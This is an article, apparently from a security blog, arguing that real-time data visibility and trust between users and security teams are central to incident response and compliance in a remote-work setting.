In today’s late-pandemic, high-threat world, data visibility has become the critical success factor for security teams as they navigate a murky “grey zone” of user behavior and anomalies across vastly larger sets of data.
Nowadays, responding to a digital security incident goes far beyond marking files or artifacts as malicious or clean and just remove them. This approach might have solved the problem before, but the context has become too complex.
Threat actors continue to become more sophisticated in the execution of their attacks every year, while the transition to remote work adds significant challenges to corporate security. All the way around, digital security has become much less black and white.
Within this “grey zone,” malicious or legit activity is mainly defined by a behavior or an anomaly that makes the activity out of ordinary, and not just by a signature provided by an AV (anti-virus tool). This validation might be interesting, but it does not guarantee much.
On other words, files perceived as clean can (and, unfortunately, will) be used for a malicious purpose, just as files marked as malicious may in fact be legit. For example, even properly used IT troubleshooting tools can appear as elements of a cyberattack.
At this point, improving the security posture means generating visibility over data and activity. The goal should be to determine the scope and nature of specific activity by inspecting detailed blocks of logged data and activity.
The Benefits of Real-Time Data Visibility
Real-time data visibility allows security teams to understand what is actually happening, as it happens. This level of proximate insight allows them to gain an accurate context around user behavior at a given point, speeding awareness of issues and reducing the time needed to correct them.
- Rethinking Trust in the Company – This is not only a technical issue. To achieve data visibility in a meaningful way, companies need to rethink how they create trusting relationships between users and security team. Users need to understand that security is not a barrier to productivity just as security engineers appreciate user concerns about being monitored. In the end, security is about protecting the assets and interests of the company, and everyone needs to be on board with that.
- Speeding Incident Response – Real time visibility is the tool we use to respond to attacks with immediacy. Incident response, known as IR, dictates that reaction should be as fast as possible. Sounds great, but in practice, too often it’s a challenge, especially with the most devious attack. The solution is a new level of vigilance across the company to facilitate the kind of proactivity needed to understand the context and respond quickly and appropriately.
- Improving Compliance – Beside security, real-time visibility can help improve compliance, which has itself become more complex during the pandemic. Today, most companies, in the wake of remote working, allow employees to use company devices for personal needs. This kind of convenience brings the obvious risk of company assets being used in a way which could lead to security breaches as well as compliance and other legal issues. You don’t need to be afraid of “Big Brother” watching your every move to agree that certain uses should be out of bounds, such as torrents, pirated software or the installation of games.
Each Company Must Choose its Security Path
At the end of the day, cybersecurity is a company-wide effort intended to prevent financial losses, prevent poor infrastructure performance and avoid creating a negative image for the company.
Everyone has a role to play.
That is why communication with users is vital, so that employees appreciate the goals of the security team, even learning to identify possible threats directly by interacting with security members. This approach builds trust in the process across levels.
Of course, each company must balance its risks and choose its own path. The ideal case described above requires prerequisites such as planning, investment and an ongoing commitment to grow from a security perspective.
Risk managers need to help define a security posture by defining what risks are acceptable and which are not, taking into consideration the size of the company, the domain where the company operates, and the potential risks of a data breach.
At the end of the day, each company needs to decide what’s worth protecting and what that protection is worth.